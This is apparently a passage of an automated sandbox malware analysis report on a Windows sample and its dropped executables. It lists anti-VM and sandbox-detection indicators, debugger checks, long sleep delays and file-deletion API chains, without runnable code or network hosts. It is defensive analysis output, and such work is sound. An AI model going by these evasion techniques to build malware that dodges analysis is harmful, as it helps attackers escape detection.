Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Dhy2kmz.exe PID: 6552, type: MEMORYSTR

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\9876567899.bat.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-97267
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe

API/Special instruction interceptor: Address: F02CD4

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Memory allocated: BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Memory allocated: 2900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Memory allocated: 26B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Memory allocated: 11D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Memory allocated: 11D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Window / User API: threadDelayed 1512			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Window / User API: threadDelayed 6051			Jump to behavior

Source: C:\Users\user\Desktop\9876567899.bat.exe	API coverage: 3.4 %
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	API coverage: 3.6 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 6656	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6656	Thread sleep time: -2700000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6656	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6152	Thread sleep count: 1512 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6152	Thread sleep count: 6051 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -99516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -99406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -99293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -99062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -98953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -98844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -98734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -98624s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -98516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -98406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -98297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -98187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -98078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -97968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -97858s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -97687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -97578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -97468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -97359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -97250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -97141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -97016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -96906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -96796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -96687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -96578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -96468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -96359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -96250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -96140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156	Thread sleep time: -96031s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0074C2A2 FindFirstFileExW,	0_2_0074C2A2
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_007868EE FindFirstFileW,FindClose,	0_2_007868EE
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0078698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0078698F
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0077D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0077D076
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0077D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0077D3A9
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00789642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00789642
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0078979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0078979D
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00789B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00789B2B
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0077DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0077DBBE
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00785C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00785C97
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0006C2A2 FindFirstFileExW,	2_2_0006C2A2
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A68EE FindFirstFileW,FindClose,	2_2_000A68EE
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_000A698F
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0009D076
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0009D3A9
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_000A9642
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_000A979D
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_000A9B2B
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0009DBBE
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_000A5C97

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_007142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007142DE

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 99516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 99293	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 99172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 99062	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 98844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 98624	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 98516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 98406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 98297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 98187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 98078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 97968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 97858	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 97687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 97468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 97359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 97250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 97141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 97016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 96906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 96796	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 96687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 96578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 96468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 96359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 96250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 96140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Thread delayed: delay time: 96031	Jump to behavior

Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: Dhy2kmz.exe, 00000004.00000002.2139509814.0000000000C51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_0078EAA2 BlockInput,

0_2_0078EAA2

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_00742622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00742622

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_007142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007142DE

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00734CE8 mov eax, dword ptr fs:[00000030h]	0_2_00734CE8
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_01322D58 mov eax, dword ptr fs:[00000030h]	0_2_01322D58
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_01322CF8 mov eax, dword ptr fs:[00000030h]	0_2_01322CF8
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_013216A8 mov eax, dword ptr fs:[00000030h]	0_2_013216A8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00054CE8 mov eax, dword ptr fs:[00000030h]	2_2_00054CE8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00F02FA0 mov eax, dword ptr fs:[00000030h]	2_2_00F02FA0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00F02F40 mov eax, dword ptr fs:[00000030h]	2_2_00F02F40
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00F018F0 mov eax, dword ptr fs:[00000030h]	2_2_00F018F0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 9_2_00F01BF0 mov eax, dword ptr fs:[00000030h]	9_2_00F01BF0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 9_2_00F01B90 mov eax, dword ptr fs:[00000030h]	9_2_00F01B90
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 9_2_00F00540 mov eax, dword ptr fs:[00000030h]	9_2_00F00540
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 11_2_010D9700 mov eax, dword ptr fs:[00000030h]	11_2_010D9700
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 11_2_010DADB0 mov eax, dword ptr fs:[00000030h]	11_2_010DADB0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 11_2_010DAD50 mov eax, dword ptr fs:[00000030h]	11_2_010DAD50
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 12_2_00F32BD0 mov eax, dword ptr fs:[00000030h]	12_2_00F32BD0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 12_2_00F34220 mov eax, dword ptr fs:[00000030h]	12_2_00F34220
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 12_2_00F34280 mov eax, dword ptr fs:[00000030h]	12_2_00F34280
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 14_2_00EB8B60 mov eax, dword ptr fs:[00000030h]	14_2_00EB8B60
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 14_2_00EB74B0 mov eax, dword ptr fs:[00000030h]	14_2_00EB74B0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 14_2_00EB8B00 mov eax, dword ptr fs:[00000030h]	14_2_00EB8B00
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 15_2_01533948 mov eax, dword ptr fs:[00000030h]	15_2_01533948
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 15_2_014D257B mov eax, dword ptr fs:[00000030h]	15_2_014D257B
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 15_2_015338E8 mov eax, dword ptr fs:[00000030h]	15_2_015338E8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 15_2_01532298 mov eax, dword ptr fs:[00000030h]	15_2_01532298
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 16_2_01642660 mov eax, dword ptr fs:[00000030h]	16_2_01642660
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 16_2_01642600 mov eax, dword ptr fs:[00000030h]	16_2_01642600
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 16_2_01640FB0 mov eax, dword ptr fs:[00000030h]	16_2_01640FB0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 17_2_00F02368 mov eax, dword ptr fs:[00000030h]	17_2_00F02368
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 17_2_00F039B8 mov eax, dword ptr fs:[00000030h]	17_2_00F039B8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 17_2_00F03A18 mov eax, dword ptr fs:[00000030h]	17_2_00F03A18
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 18_2_00FA2870 mov eax, dword ptr fs:[00000030h]	18_2_00FA2870
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 18_2_00FA2810 mov eax, dword ptr fs:[00000030h]	18_2_00FA2810
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 18_2_00FA11C0 mov eax, dword ptr fs:[00000030h]	18_2_00FA11C0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 18_2_00F2257B mov eax, dword ptr fs:[00000030h]	18_2_00F2257B
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 19_2_01572B40 mov eax, dword ptr fs:[00000030h]	19_2_01572B40
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 19_2_015741F0 mov eax, dword ptr fs:[00000030h]	19_2_015741F0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 19_2_01574190 mov eax, dword ptr fs:[00000030h]	19_2_01574190
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 20_2_01434CC0 mov eax, dword ptr fs:[00000030h]	20_2_01434CC0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 20_2_01434C60 mov eax, dword ptr fs:[00000030h]	20_2_01434C60
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 20_2_01433610 mov eax, dword ptr fs:[00000030h]	20_2_01433610
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 21_2_01302298 mov eax, dword ptr fs:[00000030h]	21_2_01302298
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 21_2_013038E8 mov eax, dword ptr fs:[00000030h]	21_2_013038E8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 21_2_01303948 mov eax, dword ptr fs:[00000030h]	21_2_01303948
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 22_2_015FDDC8 mov eax, dword ptr fs:[00000030h]	22_2_015FDDC8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 22_2_015FDD68 mov eax, dword ptr fs:[00000030h]	22_2_015FDD68
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 22_2_015FC718 mov eax, dword ptr fs:[00000030h]	22_2_015FC718
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 23_2_0144257B mov eax, dword ptr fs:[00000030h]	23_2_0144257B
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 23_2_014B3BF8 mov eax, dword ptr fs:[00000030h]	23_2_014B3BF8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 23_2_014B5248 mov eax, dword ptr fs:[00000030h]	23_2_014B5248
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 23_2_014B52A8 mov eax, dword ptr fs:[00000030h]	23_2_014B52A8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 24_2_012D3D30 mov eax, dword ptr fs:[00000030h]	24_2_012D3D30
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 24_2_012D3D90 mov eax, dword ptr fs:[00000030h]	24_2_012D3D90
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 24_2_012D26E0 mov eax, dword ptr fs:[00000030h]	24_2_012D26E0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 25_2_01324218 mov eax, dword ptr fs:[00000030h]	25_2_01324218
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 25_2_01324278 mov eax, dword ptr fs:[00000030h]	25_2_01324278
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 25_2_01322BC8 mov eax, dword ptr fs:[00000030h]	25_2_01322BC8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 26_2_01603258 mov eax, dword ptr fs:[00000030h]	26_2_01603258
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 26_2_016048A8 mov eax, dword ptr fs:[00000030h]	26_2_016048A8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 26_2_01604908 mov eax, dword ptr fs:[00000030h]	26_2_01604908
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 27_2_017B3CF8 mov eax, dword ptr fs:[00000030h]	27_2_017B3CF8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 27_2_017B2648 mov eax, dword ptr fs:[00000030h]	27_2_017B2648
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 27_2_017B3C98 mov eax, dword ptr fs:[00000030h]	27_2_017B3C98
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 28_2_00D73240 mov eax, dword ptr fs:[00000030h]	28_2_00D73240
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 28_2_00D71BF0 mov eax, dword ptr fs:[00000030h]	28_2_00D71BF0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 28_2_00D732A0 mov eax, dword ptr fs:[00000030h]	28_2_00D732A0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 29_2_01D4DD50 mov eax, dword ptr fs:[00000030h]	29_2_01D4DD50
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 29_2_01D4C700 mov eax, dword ptr fs:[00000030h]	29_2_01D4C700
